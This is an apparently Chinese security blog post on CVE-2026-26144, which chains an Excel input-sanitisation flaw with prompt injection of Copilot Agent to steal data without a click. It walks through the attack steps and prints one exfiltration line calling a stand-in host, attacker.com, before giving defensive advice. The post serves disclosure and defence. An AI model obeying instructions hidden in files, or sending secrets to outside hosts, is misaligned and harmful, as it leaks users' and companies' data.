🧠 一、事件本质:传统漏洞 + AI Agent = 全新攻击范式

近期最受关注的漏洞 CVE-2026-26144,是微软在 2026 年 3 月补丁中修复的高危问题,被评为严重等级漏洞。

该漏洞本质属于 Excel 中的输入未正确净化(Improper Neutralization)导致的XSS问题,但真正的危险来自它与 Copilot Agent 的结合,使其成为AI驱动的数据窃取攻击。

微软官方说明指出,攻击者可以操控Copilot代理,通过非预期网络路径泄露数据,并且实现零点击攻击。

攻击范式已经发生变化:

👉 从“攻击用户” → “操控AI代理执行攻击”

核心特征如下👇

⚠️ 零点击(Zero-click)

⚠️ 无需权限提升

⚠️ AI作为执行主体

⚠️ 合法流量完成数据外泄

🔗 二、攻击链拆解(从Excel到数据外泄全过程)

Step 1️⃣:恶意Excel构造

攻击者构造包含恶意输入的 Excel 文件,本质是将 payload 混入正常数据结构中

这些内容可能嵌入:

单元格

公式

预览渲染数据

Step 2️⃣:Copilot Agent自动解析

当文件被系统处理(甚至只是预览)时:

Copilot读取Excel上下文

AI无法区分数据与指令

恶意语义被当作“任务”执行

👉 这是典型 Prompt Injection 攻击路径

已有研究表明,LLM系统在这种“指令污染”场景下极易被诱导执行越权操作

Step 3️⃣:AI触发外部通信

漏洞允许恶意输入影响AI行为,例如:

fetch("https://attacker.com/leak?info=" + encodeURIComponent(secret))

实际执行逻辑并不依赖浏览器,而是:

AI理解“发送数据”的语义

Copilot主动发起请求

使用合法网络能力绕过安全检测

该漏洞可以让攻击者“利用AI代替自己发请求”

Step 4️⃣:零点击数据外泄

攻击成立关键在于:

👉 用户无需点击,仅预览或自动处理即可触发

攻击者可以窃取:

📊 Excel业务数据

🔐 凭证与Token

📂 企业内部信息

最终由 Copilot 发送到外部服务器,实现静默数据泄露

🧬 三、漏洞核心技术根因(专业视角)

1️⃣ 输入净化失败(XSS根因)

Excel 未正确过滤输入内容:

Improper Neutralization of Input

导致恶意内容可被解析并执行,从而形成基础攻击入口

2️⃣ Prompt Injection + AI执行链

传统攻击:

XSS → 浏览器执行

现在演变为:

XSS → AI理解 → AI执行 → 数据外发

👉 攻击执行者从“代码”变成“AI代理”

3️⃣ 信任边界崩塌

Copilot具备高权限能力:

读取本地文件

访问企业数据

发起网络请求

但输入却来自外部不可信内容

形成链路:

外部输入 → AI → 内部数据 → 外部泄露

👉 典型 Trust Boundary Collapse(信任边界崩塌)

4️⃣ 零点击触发机制

该漏洞最大突破点:

👉 无需用户交互即可触发攻击

甚至在:

邮件预览

文件索引

AI摘要生成

阶段就可能被触发

🧪 四、为什么这次攻击“质变”

对比传统Office漏洞:

维度传统漏洞Copilot漏洞

触发方式点击/宏❌ 零点击

执行主体用户🤖 AI

行为特征异常明显👻 极隐蔽

数据出口本地🌐 AI外发

本质变化:

👉 攻击者不再直接攻击系统,而是操控AI成为攻击代理

🧨 五、企业级风险评估

🎯 成功率:极高

Excel是企业核心工具,传播路径极广

🎯 检测难度:极高

请求来自合法Office进程

无宏、无木马

🎯 影响范围:灾难级

财务数据泄露

商业机密外流

凭证泄露导致横向攻击

👉 本质:AI成为“合规的数据外传通道”

🛡️ 六、防御建议(专业实践)

🔒 限制Copilot能力

禁止访问敏感数据域

限制自动执行行为

🌐 出站流量控制

阻止Excel访问未知外部地址

监控异常HTTP请求

🔍 输入隔离

if input_source == "external": sanitize_or_block()

⚙️ 及时打补丁

微软已在 2026 年 3 月更新中修复该漏洞,需优先部署

🧱 临时措施

禁用Copilot Agent

关闭预览功能

🧩 七、趋势判断:AI安全进入“0-click时代”

该漏洞释放出一个关键信号:

👉 攻击目标正在从“人”转向“AI代理”

演进路径:

宏病毒 → 浏览器漏洞 → XSS → Prompt Injection → AI Agent攻击

未来趋势:

🤖 自动化AI攻击链

🧠 AI驱动数据窃取

🕵️ 无文件攻击(Fileless AI Attack)

🎯 结语(专业判断)

这不是一个普通漏洞,而是一次安全范式跃迁

👉 攻击对象从“系统执行层”上移到“AI决策层”

未来真正的安全核心将变成:

👉 如何防止AI被攻击者“利用来攻击你自己”

ChainSafeAI(链熵科技)专注于区块链生态安全,以“数据驱动 + 技术赋能”构建360°全方位安全防护体系,服务于交易所、金融机构、OTC服务商及加密资产投资者。

公司提供覆盖KYT风险监测、智能合约审计、加密资产追踪、区块链漏洞测试等在内的全维度安全与合规技术解决方案,助力客户防范洗钱、诈骗等风险,保障业务合规运行。

通过实时风险预警、合规审查与资金溯源分析,协助客户识别链上异常行为、防范洗钱及诈骗风险、降低被盗损失并提升资产追回可能性。

Logo

欢迎加入DeepSeek 技术社区。在这里,你可以找到志同道合的朋友,共同探索AI技术的奥秘。

更多推荐